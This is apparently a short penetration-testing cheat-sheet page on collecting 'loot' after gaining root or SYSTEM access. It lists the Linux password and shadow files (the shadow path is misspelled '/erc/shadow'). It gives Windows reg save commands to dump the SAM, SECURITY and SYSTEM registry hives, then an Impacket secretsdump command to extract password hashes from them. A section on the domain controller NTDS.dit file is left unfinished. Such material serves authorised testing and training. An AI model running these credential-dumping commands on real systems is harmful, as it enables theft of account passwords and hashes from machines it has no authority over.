Loot
Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑

Linux

Dump users and passwords

Collect files on target
1
/etc/passwd
2
/erc/shadow
Copied!

Windows

Dump SAM

Collect files on target
1
reg save hklm\sam .\sam
2
reg save hklm\security .\security
3
reg save hklm\system .\system
Copied!
Then crack them using Impackets' secretsdump
1
secretsdump.py -sam sam -security security -system system LOCAL
Copied!

Dump NTDS (DC)

By default, the Ntds.dit file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.
TODO (see /13-misc/impacket.md)